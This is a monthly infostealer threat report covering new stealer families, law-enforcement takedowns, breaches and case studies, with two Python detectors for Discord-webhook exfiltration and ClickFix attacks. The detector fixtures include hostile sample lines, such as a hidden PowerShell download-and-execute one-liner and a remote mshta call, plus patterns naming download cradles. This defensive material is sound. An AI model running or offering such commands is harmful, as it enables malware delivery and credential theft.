Executive Summary

This monthly report highlights the key developments in the infostealer landscape, drawn primarily from community-sourced intelligence and open-source threat feeds. The following points summarize this month’s most important findings:

  • New Stealer Families Detected

    Community monitoring, particularly from social media threat intelligence sources and malware repositories, led to the discovery of several new stealer families, including Katz Stealer, Cmimai Stealer, and Switch Stealer.

  • Major Threat Events

    Two significant threat events marked this month. Operation Secure, a global law enforcement crackdown, targeted multiple infostealer networks, resulting in arrests and infrastructure seizures. In contrast, the attempted takedown of Lumma Stealer remains incomplete, with numerous panels and C2 servers still active.

  • Notable Data Breaches Linked to Infostealers

    A significant data breach was observed this month, impacting user credentials and other sensitive data.

  • Global Compromise Trends

    Stealer log analysis reveals geographic and service-based trends. The most compromised countries, email providers, and social platforms are mapped and visualized to show where stealer campaigns are having the greatest impact.

  • Supporting Case Studies & IoC Tables

    A few case studies have been included to spotlight unusual patterns or specific campaigns observed this month. These come with detailed IOCs to support threat detection and response efforts.

New Infostealer Threats Identified

Katz stealer

Katz Stealer was recently advertised on a cybercrime forum by a threat actor using the alias "Katz Stealer". This lightweight malware, written in C/ASM and under 100KB in size, is marketed as fully undetectable and designed for credential theft. It comes equipped with a wide range of features targeting various platforms and services, including Chrome password decryption, MetaMask wallet theft, OAuth token harvesting, and Telegram injection.

The malware also includes a dedicated web panel that offers advanced functionality such as two-factor authentication (2FA) login, log filtering by geographic and temporal parameters, file and folder search with export capabilities, and integration with Discord and Telegram for alerts. The panel supports features like stealth mode, fake error pop-ups, anti-VM detection, and self-deletion for evasion.

Cmimai Stealer

Cmimai Stealer is a malicious Visual Basic Script (VBS)-based stealer that is currently being distributed, with evidence suggesting it originated from a user based in Palestine. Upon execution, the stealer performs system reconnaissance by gathering basic system information such as the computer name, username, and operating system version. It then attempts to collect browser-related data, likely including cookies, saved passwords, and other autofill data. This data is formatted into a structured Discord webhook payload and exfiltrated via the Discord API using embedded JSON. The script includes functions for sending this information and logs various stages of the process, indicating a designed flow for initialization, data collection, and ongoing diagnostic reporting.
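The exfiltration path described above (a script host posting JSON to a Discord webhook) is easy to spot in network telemetry that records the originating process. The following detection is an added example, not part of the original report or the stealer itself; the log format, hostnames and webhook values are constructed, and the webhook token is deliberately dropped from the alert so it is not copied into ticketing systems.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample proxy/EDR network log lines (not real traffic):
# timestamp | host | process image | method | url
SAMPLE_LOG = """\
2025-06-12T09:14:03Z|WS-0142|C:\\Windows\\System32\\wscript.exe|POST|https://discord.com/api/webhooks/1234567890/AbCdEfGhIjKlMnOpQrStUvWxYz
2025-06-12T09:14:05Z|WS-0142|C:\\Program Files\\Discord\\Discord.exe|GET|https://discord.com/api/v9/users/@me
2025-06-12T09:15:40Z|WS-0077|C:\\Windows\\System32\\cscript.exe|POST|https://discordapp.com/api/webhooks/99887766/zyxwvu
2025-06-12T09:16:01Z|WS-0077|C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|POST|https://discord.com/api/webhooks/55555/legit
"""

# Discord webhook URLs carry the channel webhook id and a bearer-like token in the path.
WEBHOOK_RE = re.compile(r"^https://(?:discord|discordapp)\.com/api/webhooks/(\d+)/([A-Za-z0-9_-]+)")

# Script interpreters a VBS/PowerShell stealer runs under. The Discord client or a
# browser posting to a webhook is normal; a script host doing it is the signal.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}


@dataclass
class Alert:
    timestamp: str
    host: str
    process: str
    webhook_id: str  # kept for correlation; the token is intentionally not stored


def detect_script_host_webhook_exfil(log_text: str) -> List[Alert]:
    """Return one Alert per POST to a Discord webhook made by a script host."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, image, method, url = line.split("|", 4)
        match = WEBHOOK_RE.match(url)
        if method != "POST" or match is None:
            continue
        exe = image.rsplit("\\", 1)[-1].lower()
        if exe in SCRIPT_HOSTS:
            alerts.append(Alert(ts, host, exe, match.group(1)))
    return alerts


if __name__ == "__main__":
    for alert in detect_script_host_webhook_exfil(SAMPLE_LOG):
        print(alert)
```

Blocking discord.com webhook paths at the proxy for script hosts, while leaving the Discord client alone, is the corresponding preventive control.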

Switch Stealer

This month we observed a new script-based stealer targeting Windows known as "Switch's Private Stealer," which claims to extract sensitive data such as passwords, cookies, payment cards, browsing history, downloads, and Discord tokens. This stealer, or grabber, uses the GoFile web service for data exfiltration.

Major Threat Events

Operation Secure: Global Crackdown on Infostealer Networks

Operation Secure, a coordinated international cybercrime takedown led by INTERPOL, was active between January and April 2025, with the results officially announced on June 11. The operation focused on disrupting the infrastructure behind major information stealers, successfully taking down over 20,000 IP addresses linked to malware such as Vidar, Lumma Stealer (LummaC2), and Rhadamanthys. INTERPOL collaborated closely with cybersecurity firms including Group-IB, Kaspersky, and Trend Micro, producing Cyber Activity Reports that provided critical intelligence. This intelligence was then shared with cybercrime units across Asia, aiding in the identification and arrest of several cybercriminals and the seizure of malicious domains used to distribute stealer malware.

The Unfinished Takedown of Lumma Stealer

In May 2025, Microsoft, in collaboration with global cybersecurity partners, conducted a coordinated disruption campaign against Lumma Stealer's infrastructure. The operation reportedly took down over 1,000 domains and more than 90 associated Telegram channels used for distribution and command-and-control.

However, Lumma has not been fully neutralized. According to threat data from MalwareBazaar and other OSINT sources, active Indicators of Compromise (IOCs) were observed on June 17–18, and domain modification timestamps show activity as recent as June 30, 2025. These findings indicate that parts of Lumma’s infrastructure remain functional or are being reconstituted, highlighting the infostealer’s adaptability and the challenges in achieving complete shutdowns of such malware ecosystems.

Notable Data Breaches

MassLogger Malware Spread via Compromised Government Email in Bosnia

A recent MassLogger malware campaign was observed leveraging an allegedly compromised email account belonging to an employee of the Ministry of Agriculture, Water Management and Forestry of Bosnia and Herzegovina. The initial phishing vector involves a JavaScript file, which connects to a remote server to download additional payloads.

MassLogger is a fully-featured malware written in .NET, equipped with various modules. It is designed for ease of use, even by less technically skilled malicious actors. Key functionalities include FTP credential theft, email access, keylogging, and multiple evasion techniques to bypass sandboxes and honeypots. The primary objective of MassLogger is to gather and exfiltrate sensitive data from infected systems. It scans the host for specific software installations and attempts to retrieve stored passwords. The gathered data is compiled into a log file, as its name suggests, and is then exfiltrated to the attacker’s command-and-control server.

Paraguay Faces Historic Data Breach Exposing 7.4 Million Citizens

A major data breach has exposed 7.4 million records containing the personally identifiable information (PII) of Paraguayan citizens, now listed for sale on the dark web. Threat actors are attempting to sell this data rapidly, raising urgent concerns about imminent exploitation and potential mass victimization across the country. The cybercriminals behind the attack have demanded a $7.4 million ransom, equivalent to $1 per citizen, in what is being described as one of the most severe cybersecurity incidents in Paraguay’s history. The extortion campaign includes a symbolic deadline of Friday, June 13, 2025.

Early signs of vulnerabilities in the country’s digital infrastructure surfaced nearly two years ago, when one of the government’s systems was reportedly compromised, although no public data leak occurred at the time. Notably, accusations were directed at China for allegedly conducting malicious cyber operations targeting South America, with Paraguay explicitly named among the possible targets.

The Hy-Vee Data Breach and the Role of Infostealers

The data breach at Hy-Vee was traced back to an infostealer malware infection affecting over 50 employee devices. Malware strains such as StealC, Lumma, and RedLine were used to silently extract saved login credentials, including those granting access to internal Atlassian tools like Jira and Confluence. These compromised credentials were later acquired by the hacker group Stormous, which exploited them to access Hy-Vee’s internal systems—bypassing technical defenses entirely by using legitimate employee logins. On June 23rd, Stormous publicly leaked the stolen data on the dark web and issued a ransom demand, warning that additional sensitive information would be released if the company failed to comply within a limited timeframe.

Malware Activity Analysis

Based on cybersecurity data collected from June 2 to June 23, 2025, India emerged as the most targeted country, recording 5,390 total infections, while Lumma was identified as the dominant stealer malware family, responsible for over 32,000 infections during the period. Threat actors heavily abused google.com, leading to the compromise of 37,255 domains, and gmail.com was the most affected email provider, with an overwhelming 1.87 million compromised accounts. Facebook topped the list of compromised social media platforms, with 30,736 affected accounts, largely due to phishing and spam campaigns. This analysis highlights a clear pattern of widespread cyber threats primarily targeting major tech platforms and developing nations, with malware families like Lumma showing persistent and dominant activity across the web during the analyzed timeframe. On average, 19,400 infections occurred daily in the month of June, and RedLine stealer accounted for approximately 23% of all infections, marking it as a significant threat alongside Lumma.

Case Studies

Amatera Stealer Uses ClickFix Trick to Infect Victims

Amatera Stealer, formerly known as ACR Stealer, has recently undergone a significant transformation with major updates and complete rebranding. It is now being actively spread through the ClearFake campaign — a malicious JavaScript framework deployed on compromised websites, often WordPress-based. This framework uses social engineering tactics, such as fake browser update prompts or error messages, to trick users into unknowingly initiating the malware.

A key technique used in this campaign is ClickFix. Victims are asked to click on a CAPTCHA, which secretly copies a malicious PowerShell command to their clipboard. They are then misled into running this command themselves, which triggers the malware’s execution process. Once launched, Amatera Stealer downloads multiple payloads from the internet and uses shellcode injection to remain stealthy and bypass security measures.
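Because the ClickFix lure makes the victim paste the command into the Run dialog themselves, the resulting process tree (explorer.exe spawning an interpreter with a download-and-execute one-liner) is a reliable hunting signal. The detector below is an added example, not code from the original report or from the Amatera operators; the Sysmon-style event records, URLs and threshold are constructed, and the marker list generalises beyond this one campaign to other clipboard-pasted ClickFix variants.

```python
import re
from typing import Dict, List

# Constructed Sysmon Event ID 1 (process creation) records, not real telemetry.
# example.invalid is a reserved name and never resolves.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iwr 'https://example.invalid/v.txt' | iex\" # I am not a robot"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Program Files\\Microsoft VS Code\\Code.exe",
     "CommandLine": "powershell -NoLogo"},
    {"Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "mshta https://example.invalid/update.hta"},
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "cmd /c dir"},
]

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Markers typical of a clipboard-pasted ClickFix one-liner: hidden window, encoded
# command, download cradle, remote HTA, or the fake "verification" text appended so
# the pasted command looks like part of a CAPTCHA step.
MARKERS = re.compile(
    r"(?i)(-w(?:indowstyle)?\s+hidden"
    r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|\b(?:iwr|irm|iex|invoke-webrequest|invoke-expression)\b"
    r"|https?://\S+\.hta\b"
    r"|not a robot|verification)"
)


def score_event(ev: Dict[str, str]) -> int:
    """0 if not an interpreter under explorer.exe, else 1 plus the marker count."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in INTERPRETERS or parent != "explorer.exe":
        return 0
    # explorer.exe as parent means the command came via the Run dialog or the shell,
    # which is exactly how a user-pasted ClickFix command is launched.
    return 1 + len(MARKERS.findall(ev["CommandLine"]))


def detect_clickfix(events: List[Dict[str, str]], threshold: int = 2) -> List[Dict[str, str]]:
    """Return the events whose score reaches the threshold (a plain 'cmd /c dir' does not)."""
    return [ev for ev in events if score_event(ev) >= threshold]
```

The HKCU RunMRU key holds the same pasted command and is worth collecting in incident response when process telemetry is missing.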

Unlike older stealers that relied on platforms like Discord or Telegram to exfiltrate stolen data, Amatera Stealer now operates a dedicated infrastructure. It uses its own website and control panel, giving the operators a centralized place to manage the stolen data. This control panel allows them to view, sort, and analyze the exfiltrated information in real-time. It also reflects their own custom branding, showcasing a more professional and organized cybercriminal operation.

Amatera Stealer is highly configurable. Based on the instructions it receives from its Command and Control (C2) server, it targets and steals sensitive data from various installed software, such as web browsers, cryptocurrency wallets, and other applications. After each function completes, it sends the collected data back to the C2 via POST requests, making it a robust, stealthy, and versatile threat in the modern cybercrime landscape.

New Phemedrone Stealer Variant Impersonates AnyDesk Website

A new variant of the Phemedrone stealer malware has been detected. This variant uses a fake website that impersonates the legitimate remote desktop software AnyDesk, hosted on the suspicious domain anydeske[.]icu. When users visit this fake site, it downloads a .NET loader program, which then launches the actual stealer malware designed to steal sensitive information from the infected computer.

The attackers behind this campaign use a control panel and Pastebin to distribute and download additional harmful payloads, making the malware flexible and capable of receiving updates or new components remotely.

Once installed, the malware communicates with the malicious domain anydeske[.]icu to download further harmful software modules. It also sends stolen data back to this server, indicating the malware’s primary goal is to exfiltrate sensitive information from victims. Additionally, the malware collects information about the infected system by running commands like whoami (which reveals the current user) and reading configuration files such as desktop.ini from multiple user folders.

KimJongRAT Stealer Variants

This month we observed two new variants of the KimJongRAT stealer, a malware family first identified in 2013, showcasing its persistent evolution. One variant utilizes a Portable Executable (PE) file, while the other employs a PowerShell implementation; both are initiated through a malicious Windows shortcut (LNK) file that downloads a dropper from an attacker-controlled CDN. The PE variant deploys a loader, a decoy PDF, and a text file, with the stealer component (net64.log) targeting broader data such as FTP and email credentials, compiled as recently as December 2024. This multi-stage approach, combined with communications encrypted using XOR and RC4 ciphers, demonstrates the malware's sophistication in evading detection.

The PowerShell variant, conversely, focuses on stealing system and browser data, including cryptocurrency wallet extensions, and includes a ZIP archive with keylogger components. It features anti-VM checks to avoid sandbox analysis, though these are imperfect, and continuously interacts with its command-and-control server to upload stolen data and download additional payloads. Both variants, with samples dating back to August 2024 and updates into March 2025, leverage legitimate CDN services to mask their activities, underscoring the ongoing threat posed by KimJongRAT's adaptability and its focus on high-value targets like cryptocurrency assets.

Rust-based Myth Stealer masquerades as game tools to steal user information

Cybersecurity researchers have recently discovered a new information-stealing malware called Myth Stealer, developed in the Rust programming language. This previously unknown threat is being spread through fake gaming websites and cracked software downloads, including titles like DDrace. It first appeared in late December 2024, initially promoted as a free beta version on Telegram. Since then, it has evolved into a malware-as-a-service (MaaS), making it easier for cybercriminals to use and distribute.

Myth Stealer tricks users by displaying a fake setup window during installation, while secretly decrypting and running malicious code in the background. Its main goal is to steal sensitive data such as passwords, browser cookies, and autofill information from popular web browsers based on Chromium (like Google Chrome) and Gecko (like Mozilla Firefox). The malware also uses advanced techniques like string obfuscation to avoid detection and analysis.

The operators behind Myth Stealer used Telegram channels to promote the malware and sell stolen account data. Although many of these Telegram channels have now been taken down, the malware was also distributed through a fake Blogger page, helping it reach more victims.

Detailed IOC Tables
